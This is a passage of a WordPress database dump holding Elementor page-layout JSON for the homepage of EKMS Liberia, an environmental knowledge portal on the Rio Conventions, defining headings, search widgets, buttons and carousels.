later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore Government and Other Institutions that have direct linkages with environmental policies and development.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"100\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Documents\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Explore the EKMS Document Database.\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-and-other-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"876ae3f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"81fa289\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9f9c8b3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#002600\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\"},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Multilateral Environmental Agreements\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49af793\",\"elType\":\"widget\",\"settings\":{\"items_list\":[{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd-1.jpg\",\"id\":1854},\"item_title\":\"UNCBD\",\"item_text\":\"The United Nations Convention on Biological Diversity\",\"item_link\":\"#\",\"item_link_target\":\"\",\"_id\":\"7311fcf\",\"item_content_type\":\"default\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"8abca95\"},{\"item_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/plugins\\/elementor\\/assets\\/images\\/placeholder.png\",\"id\":\"\"},\"item_content_type\":\"default\",\"item_title\":\"\",\"item_text\":\"\",\"item_link\":\"\",\"item_link_target\":\"\",\"item_link_rel\":\"\",\"item_button_text\":\"\",\"template_id\":\"0\",\"_id\":\"6b2d2f2\"}],\"item_layout\":\"banners\",\"animation_effect\":\"roxy\",\"img_size\":\"medium\",\"title_html_tag\":\"h6\",\"equal_height_cols\":\"true\",\"slides_to_show\":\"3\",\"slides_to_scroll\":\"3\",\"dots\":\"true\",\"pause_on_hover\":\"true\",\"background_background\":\"classic\",\"normal_opacity\":0.4,\"items_title_color\":\"#ffffff\",\"items_title_typography_typography\":\"custom\",\"items_title_typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]},\"items_title_typography_font_weight\":\"900\",\"items_title_typography_letter_spacing\":{\"unit\":\"px\",\"size\":2.5,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"jet-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"8076ded\",\"elType\":\"widget\",\"settings\":{\"title\":\"Start Contributing to the EKMS\",\"description\":\"Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resource by submitting a blog, news, story, case study, report or a publication?\",\"btn_text\":\"Join the team\",\"btn_link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/contribute\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"icon\":\"fa fa-angle-double-right\",\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"title_color\":\"#006400\",\"description_color\":\"#ffffff\",\"button_background_color\":\"#006400\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"oew-call-to-action\"}],\"isInner\":false}],\"isInner\":false}]'),(11464,1861,'_elementor_version','2.7.5'),(11465,1861,'_elementor_template_type','wp-page'),(11466,1861,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(11468,1862,'_wp_page_template','default'),(11469,1862,'_elementor_edit_mode','builder'),(11470,1862,'_elementor_data','[{\"id\":\"lnk9sxt\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":900},\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":600},\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_cbd.jpg\",\"id\":531},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#113b66\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.55},\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"fabc2a1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"ghttmw8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3q0r5o4\",\"elType\":\"widget\",\"settings\":{\"title\":\"Welcome to the EKMS\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":55},\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":1},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"4\",\"left\":\"0\",\"isLinked\":false},\"_css_classes\":\"no-margin\",\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":25}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f0wlz1l\",\"elType\":\"widget\",\"settings\":{\"editor\":\"The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Themes, Institutions and Documents.\",\"align\":\"center\",\"text_color\":\"#ffffff\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_font_family\":\"Arial\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\"},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Knowledge Resources\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#54595f\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center 